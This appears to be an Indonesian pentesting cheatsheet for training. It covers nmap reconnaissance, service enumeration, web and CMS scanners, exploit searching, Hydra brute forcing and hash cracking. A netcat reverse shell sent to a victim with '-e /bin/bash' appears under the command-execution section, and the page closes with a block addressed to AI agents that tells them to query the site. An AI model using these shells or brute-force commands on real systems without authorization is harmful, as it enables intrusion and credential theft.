# VA-PT Cheatsheet
Catatan ini ditujukan untuk mempermudah pencarian payload/script tools dalam pentesting/VA.Cheatsheet ini disadur dari akun Github rekan saya[ Satrya Mahardhika](https://github.com/mahaardhiika/VAPT-Training/).
## 5 Tahap Ethical Hacking
## Metode Uji Ringkas
## NMAP Command
Berikut beberapa rangkuman perintah NMAP untuk tujuan *reconnaissance.* (Pindah dengan klik tab)
{% tabs %}
{% tab title="Best Practice" %}
```bash
nmap -sC -sV -p- -T4 Target IP
```
{% endtab %}
{% tab title="TCP Ports \&versions" %}
```
nmap -sV Target_IP
```
{% endtab %}
{% tab title="TCP Ports" %}
```
nmap -sT Target IP
```
{% endtab %}
{% tab title="UDP Ports" %}
```
nmap -sU Target IP
```
{% endtab %}
{% tab title="Scan for vulnerability" %}
```
nmap --vuln Target IP
```
{% endtab %}
{% endtabs %}
#### NMAP Command
| # | Options | Description |
| - | ------- | -------------------------------- |
| 1 | -sT | TCP Connect port scan |
| 2 | -sU | UDP Port scan |
| 3 | -p | specific port scan |
| 4 | -p- | Scan All ports |
| 5 | -sV | Check Version of running service |
| 6 | -sC | Scan with default safe Scripts |
| 7 | -O | OS Fingerprinting |
| # | Command | Scan For |
| - | ---------------------------- | --------------------------------------------------------------- |
| 1 | nmap -sV `Target_IP` | Open TCP Ports and versions |
| 2 | nmap -sT `Target IP` | Open TCP Ports |
| 3 | nmap -sU `Target IP` | Open UDP Ports |
| 4 | nmap -sC -sV -p- `Target IP` | Open All TCP Ports and Versions + Scan with default NSE Scripts |
| 5 | nmap --vuln `Target IP` | Scan for vulnerability ()
|
Anda dapat mencari script NMAP pada:
```bash
ls /usr/share/nmap/scripts
```
## Interesting Port
| Port | Deskripsi | Port | Deskripsi |
| ---- | ---------------------------------------------------------------------------------------------------------------------- | -------- | ---------------------------------------------------------------------------------------------------------- |
| 21 | FTP server, unencrypted. | 161, 162 | SNMP Service |
| 22 | SSH server, can be connected to via SSH | 389, 636 | LDAP Directory Service |
| 23 | Telnet. Basically an unencrypted SSH | 443 | HTTPS, check for HeartBleed? View certificate for information? |
| 25 | SMTP - Email sending service. | 445 | SMB Shares service, likely vulnerable to an SMB RCE |
| 69 | TFTP Server. Very uncommon and old. Uses UDP. | 587 | Submission. If Postfix is run on it, it could be vunerable to shellshock |
| 80 | HTTP Server. Try visiting IP with web browser. | 631 | CUPS. Basically a Linux Printer Service for sharing printers. |
| 88 | Kerberos Service. Check, [MS14-068](https://labs.f-secure.com/archive/digging-into-ms14-068-exploitation-and-defence/) | 1433 | Default MSSQL port. `sqsh -S 10.1.11.41 -U sa` |
| 110 | POP3 mail service. Login via telnet or SSH? | 1521 | Oracle DB. `tnscmd10g version -h 10.1.11.51` |
| 111 | RPCbind. This can help us look for NFS-shares | 2021 | Oracle XML DB. Check [Default Passwords](https://docs.oracle.com/cd/B10501_01/win.920/a95490/username.htm) |
| 119 | Network Time Protocol | 2049 | Network File System. `showmount -e 10.1.11.64` |
| 135 | MSRPC - Microsoft RPC | 3306 | MySQL Database. Connect: `mysql --host=10.1.11.69 -u root -p` |
| 139 | SMB Service. likely vulnerable to an SMB RCE | 3389 | Listening for RDP connection |
## Enumeration
### SSH
Try connect to ssh service
```bash
ssh kali@10.131.2.128
```
### FTP
Check for Anonymous login allowed. Use username: **anonymous ;** password: (blank or anything).(Pindah dengan klik tab)
{% tabs %}
{% tab title="Connect" %}
```bash
ftp open Target_IP
```
{% endtab %}
{% tab title="Ambil File" %}
```
get
```
{% endtab %}
{% endtabs %}
### SMB
Connect ke SMB untuk mengecek Shares yang available. (Pindah dengan klik tab)
{% tabs %}
{% tab title="Mencari share available" %}
```bash
smbclient -L Target_IP
```
{% endtab %}
{% tab title="Connect" %}
```
smbclient //Target_IP/Shares_name
```
{% endtab %}
{% endtabs %}
### SMTP
Verify SMTP Port using netcat
```bash
nc -nv Target_IP 25
```
### POP3
```bash
root@kali:~# telnet $ip 110
+OK beta POP3 server (JAMES POP3 Server 2.3.2) ready
USER billydean
+OK
PASS password
+OK Welcome billydean
list
+OK 2 1807
1 786
2 1021
retr 1
+OK Message follows
From: jamesbrown@motown.com
Dear Billy Dean,
Here is your login for remote desktop ... try not to forget it this time!
username: billydean
password: PA$$W0RD!Z
```
### WEB/ HTTP
#### 1. **Directory Finding**
Directory finding adalah langkah penting dalam pemetaan situs web. Berikut beberapa tools yang bisa digunakan untuk melakukan directory brute forcing:
**dirb**
* **dirb** adalah alat untuk mencari direktori dan file di server web menggunakan wordlist.
```bash
dirb http:/// /usr/share/wordlists/dirb/common.txt
```
* Anda bisa mengganti `common.txt` dengan wordlist lain yang lebih lengkap sesuai kebutuhan.
**dirsearch**
* **dirsearch** adalah tool Python yang lebih cepat dan mendukung multithreading dibandingkan dirb. Instalasi:
```bash
git clone https://github.com/maurosoria/dirsearch.git
cd dirsearch
pip install -r requirements.txt
```
* Penggunaan:
```bash
python3 dirsearch.py -u http://
```
#### 2. **Web Application Scanning**
Untuk memeriksa potensi kerentanannya, Anda bisa melakukan pemindaian aplikasi web dengan tools berikut:
**Nikto**
* **Nikto** adalah scanner web server yang mencari lebih dari 6700 potensi masalah keamanan.
```bash
nikto -h http://
```
**Nuclei (Pemindaian Kerentanannya)**
* **Nuclei** adalah framework pemindaian kerentanannya yang sangat cepat. Nuclei dapat digunakan untuk memindai berbagai jenis kerentanannya seperti CVE, XSS, SQLi, dan lainnya. Instalasi:
```bash
sudo apt install nuclei
```
* Penggunaan dasar:
```bash
nuclei -u http://
```
* Anda bisa menggunakan template lain untuk pemindaian lebih mendalam, misalnya XSS:
```bash
nuclei -u http:// -t xss/
```
#### 3. **CMS Scanning**
Jika situs web menggunakan CMS tertentu, Anda bisa menggunakan tools khusus untuk memeriksa kerentanannya. Beberapa CMS umum dan tools yang dapat digunakan adalah:
**WordPress (WPScan)**
WPScan adalah alat populer untuk memindai kerentanannya di situs WordPress.
* **Pemasangan WPScan:**
```bash
sudo apt install wpscan
```
* **Pemindaian Dasar:**
```bash
wpscan --url http://
```
* **Pemindaian API (memerlukan API key):** Untuk pemindaian lebih mendalam, gunakan API WPScan dengan API Key yang bisa didapatkan di situs resmi WPScan:
```bash
wpscan --api-token --url http://
```
* **Pemeriksaan Plugin Agresif:** Untuk memeriksa plugin yang terpasang dengan cara agresif:
```bash
wpscan --url http:// -e ap --plugins-detection aggressive
```
**Joomla (Joomscan)**
Untuk memindai Joomla, Anda dapat menggunakan **Joomscan**.
* **Instalasi:**
```bash
git clone https://github.com/rezasp/joomscan.git
cd joomscan
chmod +x joomscan.py
```
* **Pemindaian:**
```bash
python joomscan.py -u http://
```
**Drupal (Droopescan)**
Untuk memindai kerentanannya di situs Drupal, gunakan **Droopescan**.
* **Instalasi:**
```bash
git clone https://github.com/droope/droopescan.git
cd droopescan
python3 setup.py install
```
* **Pemindaian:**
```bash
droopescan scan drupal -u http://
```
**Magento (MageScan)**
Untuk Magento, gunakan **MageScan**.
* **Instalasi:**
```bash
git clone https://github.com/MagentoHackers/magescan.git
cd magescan
chmod +x magescan.py
```
* **Pemindaian:**
```bash
python magescan.py http://
```
## Mencari Exploit
### Melalui Mesin Pencari (Google)
1. Perhatikan dan cari versi aplikasi yang kemungkinan rawan.
2. Lakukan pencarian di mesin pencari dengan format "\[APLIKASI] \[VERSI] \[EXPLOIT]" . Contoh: "Samba 3.5.0 exploit"
3. Prioritaskan sumber dari ExploitDB / Github /Rapid7.
4. Unduh dan gunakan exploit sesuat keterangan pada sumber terkait.
### Melalui Searchploit (Kali)
```bash
searchsploit linux 2.2.0
#Mencari exploit dengan keyword tertentu contoh linux 2.2.0
#Mendownload (Copy) exploit ke working directory
searchsploit -m Nomor_Exploit
wget Alamat_URL
#Download File
```
## Bruteforce/Hash Cracking (sample)
SSH Bruteforce With Hydra
```
hydra -L users.txt -P pass.txt 192.168.1.181 ssh
```
John The Ripper common hash
```
john --wordlist=/usr/share/wordlists/rockyou.txt hash
```
Hashcat crack md5
```
hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt --outfile=cracked.txt
```
## Command Execution Guide
### Reverse Shell
(Pindah dengan klik tab)
{% tabs %}
{% tab title="(LISTENER) YANG DI ATTACKER" %}
```bash
nc -nlvp 4444
```
{% endtab %}
{% tab title="YANG DI KIRIM KE VICTIM(TARGET)" %}
```
nc -nv IP_Attacker Port -e /bin/bash
```
{% endtab %}
{% endtabs %}
Sumber lain untuk membuat reverse shell [disini](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md) .
### Upgrade ke Interactive Shell
```bash
python -c 'import pty;pty.spawn("/bin/bash")'
CTRL+Z
stty raw -echo; fg
```
Sumber lain untuk interactive shell dapat dicek di [Linux TTY Shell Cheat Sheet](/tutorial/linux-tty-shell-cheat-sheet.md)
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://notes.anggipradana.com/tutorial/va-pt-cheatsheet.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.